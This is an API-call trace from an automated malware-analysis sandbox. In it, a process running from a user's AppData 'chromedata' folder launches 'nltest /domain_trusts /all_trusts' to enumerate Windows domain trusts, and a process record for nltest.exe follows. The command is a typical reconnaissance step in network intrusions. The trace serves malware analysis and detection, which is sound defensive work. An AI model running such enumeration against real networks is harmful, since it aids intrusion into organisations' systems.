	[0250.004] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3
	[0250.004] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3
	[0250.004] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3
	[0250.004] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3
	[0250.004] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5
	[0250.004] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5
	[0250.004] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9
	[0250.004] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9
	[0250.004] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11
	[0250.004] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12
	[0250.004] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13
	[0250.004] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13
	[0250.004] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
	[0250.004] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
	[0250.004] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
	[0250.004] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
	[0250.004] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13
	[0250.004] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13
	[0250.004] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13
	[0250.004] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13
	[0250.004] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13
	[0250.004] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16
	[0250.004] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16
	[0250.004] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17
	[0250.004] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17
	[0250.004] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18
	[0250.004] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18
	[0250.005] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18
	[0250.005] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20
	[0250.005] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20
	[0250.005] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20
	[0250.005] GetProcessHeap () returned 0x390000
	[0250.005] HeapFree (in: hHeap=0x390000, dwFlags=0x0, lpMem=0x3a3098 | out: hHeap=0x390000) returned 1
	[0250.005] GetProcessHeap () returned 0x390000
	[0250.005] RtlAllocateHeap (HeapHandle=0x390000, Flags=0x8, Size=0xa) returned 0x39d578
	[0250.005] lstrcmpW (lpString1="\\nltest.exe", lpString2="\\XCOPY.EXE") returned -1
	[0250.006] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\nltest.exe", lpCommandLine="nltest  /domain_trusts /all_trusts", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata", lpStartupInfo=0x2bf0f8*(cb=0x48, lpReserved=0x0, lpDesktop="winsta0\\default", lpTitle="nltest  /domain_trusts /all_trusts", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x2bf144 | out: lpCommandLine="nltest  /domain_trusts /all_trusts", lpProcessInformation=0x2bf144*(hProcess=0x50, hThread=0x4c, dwProcessId=0x944, dwThreadId=0x940)) returned 1
	[0250.009] CloseHandle (hObject=0x4c) returned 1
	[0250.010] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1
	[0250.010] GetProcessHeap () returned 0x390000
	[0250.010] HeapFree (in: hHeap=0x390000, dwFlags=0x0, lpMem=0x3a1f60 | out: hHeap=0x390000) returned 1
	[0250.010] GetEnvironmentStringsW () returned 0x3a1f60*
	[0250.010] GetProcessHeap () returned 0x390000
	[0250.010] RtlAllocateHeap (HeapHandle=0x390000, Flags=0x8, Size=0x97c) returned 0x3a0230
	[0250.010] FreeEnvironmentStringsW (penv=0x3a1f60) returned 1
	[0250.010] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0
	[0250.065] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x2bf038 | out: lpExitCode=0x2bf038*=0x1) returned 1
	[0250.065] CloseHandle (hObject=0x50) returned 1
	[0250.066] _vsnwprintf (in: _Buffer=0x2bf180, _BufferCount=0x13, _Format="%08X", _ArgList=0x2bf044 | out: _Buffer="00000001") returned 8
	[0250.066] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000001") returned 1
	[0250.066] GetProcessHeap () returned 0x390000
	[0250.066] HeapFree (in: hHeap=0x390000, dwFlags=0x0, lpMem=0x3a0230 | out: hHeap=0x390000) returned 1
	[0250.066] GetEnvironmentStringsW () returned 0x3a30e8*
	[0250.066] GetProcessHeap () returned 0x390000
	[0250.066] RtlAllocateHeap (HeapHandle=0x390000, Flags=0x8, Size=0x9a2) returned 0x3a0230
	[0250.066] FreeEnvironmentStringsW (penv=0x3a30e8) returned 1
	[0250.066] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1
	[0250.066] GetProcessHeap () returned 0x390000
	[0250.066] HeapFree (in: hHeap=0x390000, dwFlags=0x0, lpMem=0x3a0230 | out: hHeap=0x390000) returned 1
	[0250.066] GetEnvironmentStringsW () returned 0x3a30e8*
	[0250.066] GetProcessHeap () returned 0x390000
	[0250.066] RtlAllocateHeap (HeapHandle=0x390000, Flags=0x8, Size=0x9a2) returned 0x3a0230
	[0250.066] FreeEnvironmentStringsW (penv=0x3a30e8) returned 1
	[0250.066] GetProcessHeap () returned 0x390000
	[0250.066] HeapFree (in: hHeap=0x390000, dwFlags=0x0, lpMem=0x39d578 | out: hHeap=0x390000) returned 1
	[0250.066] DeleteProcThreadAttributeList (in: lpAttributeList=0x2bf09c | out: lpAttributeList=0x2bf09c) 
	[0250.066] _get_osfhandle (_FileHandle=1) returned 0x154
	[0250.066] SetConsoleMode (hConsoleHandle=0x154, dwMode=0x0) returned 0
	[0250.066] _get_osfhandle (_FileHandle=1) returned 0x154
	[0250.066] GetConsoleMode (in: hConsoleHandle=0x154, lpMode=0x49e141ac | out: lpMode=0x49e141ac) returned 0
	[0250.066] _get_osfhandle (_FileHandle=0) returned 0x160
	[0250.066] GetConsoleMode (in: hConsoleHandle=0x160, lpMode=0x49e141b0 | out: lpMode=0x49e141b0) returned 0
	[0250.066] GetConsoleOutputCP () returned 0x1b5
	[0250.066] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49e14260 | out: lpCPInfo=0x49e14260) returned 1
	[0250.066] SetThreadUILanguage (LangId=0x0) returned 0x409
	[0250.066] exit (_Code=1) 

Process:
	id = "59"
	image_name = "nltest.exe"
	filename = "c:\\windows\\system32\\nltest.exe"
	page_root = "0x7ee178a0"
	os_pid = "0x944"
	os_integrity_level = "0x2000"
	os_privileges = "0x800000"
	monitor_reason = "child_process"
	parent_id = "58"
	os_parent_pid = "0xf1c"
	cmd_line = "nltest  /domain_trusts /all_trusts"
	cur_dir = "C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\"
	os_username = "ZGW5TDPU\\2XC7u663GxWc"
	bitness = "64"
	os_groups = "ZGW5TDPU\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ece3" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 372
	os_tid = 0x940


Thread:
	id = 373
	os_tid = 0xf38